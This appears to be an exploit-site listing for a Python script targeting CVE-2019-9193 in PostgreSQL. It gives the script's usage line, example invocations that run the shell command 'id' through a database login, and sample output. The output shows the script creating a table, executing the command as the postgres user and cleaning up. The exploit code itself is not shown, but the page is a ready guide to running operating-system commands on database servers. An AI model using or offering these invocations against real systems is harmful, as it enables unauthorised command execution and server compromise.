Share
## https://sploitus.com/exploit?id=99ADEE88-FD94-55A9-A95F-0588E958F59E
usage: CVE-2019-9193.py [-h] [-i [IP]] [-p [PORT]] [-d [DATABASE]] [-c [COMMAND]] [-t [TIMEOUT]] [-U [USER]] [-P [PASSWORD]]
example: python3 CVE-2019-9193.py -i 127.0.0.1 -p 5432 -U postgres -c 'id'
example 2 : python3 CVE-2019-9193.py -h localhost -p 5432 -U postgres -c 'id'
output:
[+] Connecting to PostgreSQL Database on 127.0.0.1:5432
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 9.3 is likely vulnerable
[+] Creating table _30e173ba7fa5577a86b9e9ecfea13360
[+] Command executed
uid=999(postgres) gid=999(postgres) groups=999(postgres),103(ssl-cert)
[+] Deleting table _30e173ba7fa5577a86b9e9ecfea13360